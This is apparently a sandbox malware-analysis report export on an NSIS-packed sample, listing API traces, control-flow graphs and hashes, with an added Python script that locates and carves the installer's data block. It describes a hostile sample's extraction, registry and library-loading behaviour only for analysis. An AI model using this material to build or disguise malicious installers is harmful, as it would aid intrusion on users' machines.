                                            • Instruction Fuzzy Hash: DD51D171900204ABDB119F64DD85B9E7EACEB45316F20843BE911BA2D1DB7C8F418B5D
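The routine at 0x403015 is the installer stub's self-scan: it obtains its own path (GetModuleFileNameW), sizes the file (GetFileSize), walks forward through it looking for the "Null", "soft", "Inst" signature listed in the String ID line, and reports "Installer integrity check has failed" when the data block it describes does not fit in the file. The Python script below is an added example, not part of the Joe Sandbox report, the NSIS project or the sample, that performs the same search on a file so the data block can be carved for offline analysis. It assumes the standard NSIS firstheader layout and flag bits as the editor knows them from the NSIS exehead sources (28 bytes: flags, 0xDEADBEEF, "NullsoftInst", header length, total data length) and the stub's 512-byte scan step; the test image it builds is constructed, not taken from the sample.

```python
"""
Find the NSIS 'firstheader' record in an installer image the way the stub
routine at 0x403015 does (GetModuleFileNameW -> GetFileSize -> forward scan ->
signature check -> "Installer integrity check has failed" if the block does not fit).
Added example; field layout, signature and flag bits follow NSIS exehead/fileform.h
as the editor knows it (assumption), not code from the report or the sample.
"""
import struct
from dataclasses import dataclass
from typing import List, Optional

# firstheader: flags, siginfo (0xDEADBEEF), nsinst[3] ("NullsoftInst"),
# length_of_header, length_of_all_following_data -> 28 bytes, little-endian
FIRSTHEADER = struct.Struct("<II12sII")
FH_SIG = 0xDEADBEEF
FH_MAGIC = b"NullsoftInst"          # the "Null" / "soft" / "Inst" strings in the listing
FH_FLAGS_MASK = 0xF                  # any bit outside the mask => not a real header
FH_FLAG_NAMES = {0x1: "UNINSTALL", 0x2: "SILENT", 0x4: "NO_CRC", 0x8: "FORCE_CRC"}
STUB_SCAN_STEP = 512                 # the stub only tests 512-byte-aligned offsets


@dataclass(frozen=True)
class FirstHeader:
    offset: int                        # file offset of the record
    flags: int
    length_of_header: int              # size of the (usually compressed) header block
    length_of_all_following_data: int  # size of the whole data block, counted from `offset`

    @property
    def flag_names(self) -> List[str]:
        return [name for bit, name in FH_FLAG_NAMES.items() if self.flags & bit]

    @property
    def end(self) -> int:
        return self.offset + self.length_of_all_following_data


def parse_firstheader_at(buf: bytes, off: int) -> Optional[FirstHeader]:
    """Validate a candidate record with the same tests the stub applies."""
    if off < 0 or off + FIRSTHEADER.size > len(buf):
        return None
    flags, sig, magic, hdr_len, data_len = FIRSTHEADER.unpack_from(buf, off)
    if flags & ~FH_FLAGS_MASK or sig != FH_SIG or magic != FH_MAGIC:
        return None
    if len(buf) - off < data_len:      # the stub's integrity check: block must fit the file
        return None
    return FirstHeader(off, flags, hdr_len, data_len)


def find_firstheader(buf: bytes, step: int = STUB_SCAN_STEP) -> Optional[FirstHeader]:
    """Scan forward at `step`-byte boundaries. step=1 is an exhaustive search for
    images whose NSIS data is not sector-aligned; the stock stub would not find those."""
    for off in range(0, len(buf) - FIRSTHEADER.size + 1, step):
        fh = parse_firstheader_at(buf, off)
        if fh is not None:
            return fh
    return None


def carve_datablock(buf: bytes, fh: FirstHeader) -> bytes:
    """Return firstheader + header + file entries, the part worth unpacking offline."""
    return buf[fh.offset:fh.end]


def build_sample(prefix_len: int = 2048, header_len: int = 64,
                 payload_len: int = 100, flags: int = 0x4) -> bytes:
    """Constructed test image (not the sample): a fake PE prefix, a well-formed
    firstheader, then dummy header and file bytes."""
    data_len = FIRSTHEADER.size + header_len + payload_len
    record = FIRSTHEADER.pack(flags, FH_SIG, FH_MAGIC, header_len, data_len)
    return b"MZ" + b"\0" * (prefix_len - 2) + record + b"H" * header_len + b"D" * payload_len


if __name__ == "__main__":
    import sys
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    found = find_firstheader(image) or find_firstheader(image, step=1)
    if found is None:
        print("no NSIS firstheader found, or data block truncated")
    else:
        print(f"firstheader at 0x{found.offset:X}: flags={found.flag_names} "
              f"header={found.length_of_header} bytes, "
              f"data block={found.length_of_all_following_data} bytes")
```

Run it with the path of the submitted executable to get the offset and size of the data block. Two outcomes are worth recording: a record that is found only with step=1 means the installer data was re-appended without sector alignment and the stub's own scan would not locate it, and a record that parses but fails the size check is what produces the "Installer integrity check has failed" message seen in this function's strings.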

                                             Control-flow Graph (rendered in the report; the executed/not-executed colouring and the full node and edge list are not reproduced in the text export): function 0x40642B, the string-expansion routine that resolves the system, Windows and special-folder paths; basic blocks 0x40642B to 0x40669A; internal subcalls 0x4062BC, 0x406335, 0x4063EE, 0x40669D and a recursive call to 0x40642B itself.
                                            APIs
                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040656C
                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 0040657F
                                            • SHGetSpecialFolderLocation.SHELL32(0040548D,0079A700,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 004065BB
                                            • SHGetPathFromIDListW.SHELL32(0079A700,Call), ref: 004065C9
                                            • CoTaskMemFree.OLE32(0079A700), ref: 004065D4
                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065FA
                                            • lstrlenW.KERNEL32(Call,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 00406652
                                             Memory Dump Source
                                             • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: the same 16 dumps (00400000 to 007C7000 of process 00000005.00000002) listed under Memory Dump Source for the function at 0x403E6B above
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                            • API String ID: 717251189-1230650788
                                            • Opcode ID: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                            • Instruction ID: 6a9894c1754425a34e634a53c322024ca71031740d406166b65bc8419ebad360
                                            • Opcode Fuzzy Hash: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                            • Instruction Fuzzy Hash: A261F471600505ABDF249F24DD40ABE37A5AF51318F22813FE543BA2D4DB3D8AA1CB5E

                                             Control-flow Graph (rendered in the report; the executed/not-executed colouring and the full node and edge list are not reproduced in the text export): function 0x40176F, the file-extraction routine that compares file times, writes the output file and restores its timestamp (CompareFileTime, SetFileTime, CloseHandle); basic blocks 0x40176F to 0x402BD1, including one large straight-line block 0x401901 to 0x402390; internal subcalls 0x40324C, 0x402D3E, 0x405456, 0x405A54, 0x405CC3, 0x405D3A, 0x405EBF, 0x405EE4, 0x4063EE, 0x40642B, 0x40669D, 0x40674C.
                                            APIs
                                            • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,?,00000031), ref: 004017B0
                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,?,00000031), ref: 004017D5
                                              • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                              • Part of subcall function 00405456: lstrlenW.KERNEL32(007A0F28,00000000,0079A700,771B23A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                              • Part of subcall function 00405456: lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,771B23A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                              • Part of subcall function 00405456: lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,771B23A0), ref: 004054B1
                                              • Part of subcall function 00405456: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                              • Part of subcall function 00405456: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                              • Part of subcall function 00405456: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                              • Part of subcall function 00405456: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp$C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call
                                            • API String ID: 1941528284-2998094943
                                            • Opcode ID: 1581b04633949f1bdc692b7a2870eaf759d87e9c25fdc22cdc9577452c9ab1ce
                                            • Instruction ID: cd03b910d30ecf031e582351f340fed2e2266b195dd1fdcb6122cfe31266ec79
                                            • Opcode Fuzzy Hash: 1581b04633949f1bdc692b7a2870eaf759d87e9c25fdc22cdc9577452c9ab1ce
                                            • Instruction Fuzzy Hash: 0B418571510508BACF11BFB5CD85DAE3A79EF45329B20423FF422B11E1DB3C8A519A6E

                                            Control-flow Graph

                                            control_flow_graph 849 405456-40546b 850 405471-405482 849->850 851 405522-405526 849->851 852 405484-405488 call 40642b 850->852 853 40548d-405499 lstrlenW 850->853 852->853 855 4054b6-4054ba 853->855 856 40549b-4054ab lstrlenW 853->856 858 4054c9-4054cd 855->858 859 4054bc-4054c3 SetWindowTextW 855->859 856->851 857 4054ad-4054b1 lstrcatW 856->857 857->855 860 405513-405515 858->860 861 4054cf-405511 SendMessageW * 3 858->861 859->858 860->851 862 405517-40551a 860->862 861->860 862->851
                                            APIs
                                            • lstrlenW.KERNEL32(007A0F28,00000000,0079A700,771B23A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                            • lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,771B23A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                            • lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,771B23A0), ref: 004054B1
                                            • SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2531174081-0
                                            • Opcode ID: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                            • Instruction ID: 198c43ce2186877ab3aec1728abe16fb3d15ea5683a6b9ae92d40c5f72e5eea1
                                            • Opcode Fuzzy Hash: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                            • Instruction Fuzzy Hash: EC21AF75900518BACB119F65DD44ACFBFB9EF89354F10802AF904B22A1C3798A81CFA8

                                            Control-flow Graph

                                            control_flow_graph 863 405925-405970 CreateDirectoryW 864 405972-405974 863->864 865 405976-405983 GetLastError 863->865 866 40599d-40599f 864->866 865->866 867 405985-405999 SetFileSecurityW 865->867 867->864 868 40599b GetLastError 867->868 868->866
                                            APIs
                                            • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405968
                                            • GetLastError.KERNEL32 ref: 0040597C
                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405991
                                            • GetLastError.KERNEL32 ref: 0040599B
                                            Strings
                                            • C:\Users\user\Desktop, xrefs: 00405925
                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040594B
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop
                                            • API String ID: 3449924974-2752704311
                                            • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                            • Instruction ID: 4c6d3c4ce34384c56ae6b54862a6db5cebbf8231f9905efb0a53c4272bf1951e
                                            • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                            • Instruction Fuzzy Hash: E1011AB1C00219EADF009FA5DD44BEFBBB8EF04314F00803AD544B6190E7789648CFA9

                                            Control-flow Graph

                                            control_flow_graph 869 406773-406793 GetSystemDirectoryW 870 406795 869->870 871 406797-406799 869->871 870->871 872 4067aa-4067ac 871->872 873 40679b-4067a4 871->873 875 4067ad-4067e0 wsprintfW LoadLibraryExW 872->875 873->872 874 4067a6-4067a8 873->874 874->875
                                            APIs
                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                            • wsprintfW.USER32 ref: 004067C5
                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                            • String ID: %s%S.dll$UXTHEME$\
                                            • API String ID: 2200240437-1946221925
                                            • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                            • Instruction ID: 038d7fed81a94acb9f8d17f6b302bf2205b26bc145b48260013954e6d266918a
                                            • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                            • Instruction Fuzzy Hash: 65F0F670510119A7CF14AB64DD0DF9B376CAB40309F10047AA646F20D0EB7C9A68CBA8

                                            Control-flow Graph

                                            control_flow_graph 876 40324c-403263 877 403265 876->877 878 40326c-403275 876->878 877->878 879 403277 878->879 880 40327e-403283 878->880 879->880 881 403293-4032a0 call 403444 880->881 882 403285-40328e call 40345a 880->882 886 403432 881->886 887 4032a6-4032aa 881->887 882->881 888 403434-403435 886->888 889 4032b0-4032d6 GetTickCount 887->889 890 4033dd-4033df 887->890 893 40343d-403441 888->893 894 40343a 889->894 895 4032dc-4032e4 889->895 891 4033e1-4033e4 890->891 892 40341f-403422 890->892 891->894 898 4033e6 891->898 896 403424 892->896 897 403427-403430 call 403444 892->897 894->893 899 4032e6 895->899 900 4032e9-4032f7 call 403444 895->900 896->897 897->886 908 403437 897->908 902 4033e9-4033ef 898->902 899->900 900->886 910 4032fd-403306 900->910 905 4033f1 902->905 906 4033f3-403401 call 403444 902->906 905->906 906->886 914 403403-40340f call 405f96 906->914 908->894 912 40330c-40332c call 40693e 910->912 917 403332-403345 GetTickCount 912->917 918 4033d5-4033d7 912->918 920 403411-40341b 914->920 921 4033d9-4033db 914->921 922 403390-403392 917->922 923 403347-40334f 917->923 918->888 920->902 924 40341d 920->924 921->888 927 403394-403398 922->927 928 4033c9-4033cd 922->928 925 403351-403355 923->925 926 403357-403388 MulDiv wsprintfW call 405456 923->926 924->894 925->922 925->926 933 40338d 926->933 931 40339a-4033a1 call 405f96 927->931 932 4033af-4033ba 927->932 928->895 929 4033d3 928->929 929->894 937 4033a6-4033a8 931->937 935 4033bd-4033c1 932->935 933->922 935->912 936 4033c7 935->936 936->894 937->921 938 4033aa-4033ad 937->938 938->935
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CountTick$wsprintf
                                            • String ID: ... %d%%
                                            • API String ID: 551687249-2449383134
                                            • Opcode ID: 93e44d2671c096b7225e0ed32f8acedc4fb2cb11057b9db1c10a95020cbffac7
                                            • Instruction ID: 008436f450556a42ebae23d461066e9f0811e1f15f23a2ec19415b9062137ceb
                                            • Opcode Fuzzy Hash: 93e44d2671c096b7225e0ed32f8acedc4fb2cb11057b9db1c10a95020cbffac7
                                            • Instruction Fuzzy Hash: 86516C71900219DBDB11DF65DA84B9F7FB8AF0076AF14417BE814B72C1C7789A40CBAA

                                            Control-flow Graph

                                            control_flow_graph 939 405f13-405f1f 940 405f20-405f54 GetTickCount GetTempFileNameW 939->940 941 405f63-405f65 940->941 942 405f56-405f58 940->942 944 405f5d-405f60 941->944 942->940 943 405f5a 942->943 943->944
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00405F31
                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Ntwph4urc1.exe",004034A0,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004036EC), ref: 00405F4C
                                            Strings
                                            • "C:\Users\user\Desktop\Ntwph4urc1.exe", xrefs: 00405F13
                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405F18
                                            • nsa, xrefs: 00405F20
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                                            • API String ID: 1716503409-2730080912
                                            • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                            • Instruction ID: 2ec416300cd5d099b763d3688cd3c506487cb406e2025687db32897a35dea38d
                                            • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                            • Instruction Fuzzy Hash: 84F09676B00204BBDB008F55ED05E9FB7ACEB95750F10803AEA04F7140E6B499548B58

                                            Control-flow Graph

                                            control_flow_graph 945 402e41-402e6a call 40625b 947 402e6f-402e73 945->947 948 402f24-402f28 947->948 949 402e79-402e7d 947->949 950 402ea2-402eb5 949->950 951 402e7f-402ea0 RegEnumValueW 949->951 953 402ede-402ee5 RegEnumKeyW 950->953 951->950 952 402f09-402f17 RegCloseKey 951->952 952->948 954 402eb7-402eb9 953->954 955 402ee7-402ef9 RegCloseKey call 4067e3 953->955 954->952 956 402ebb-402ecf call 402e41 954->956 961 402f19-402f1f 955->961 962 402efb-402f07 RegDeleteKeyW 955->962 956->955 963 402ed1-402edd 956->963 961->948 962->948 963->953
                                            APIs
                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                            Memory Dump Source
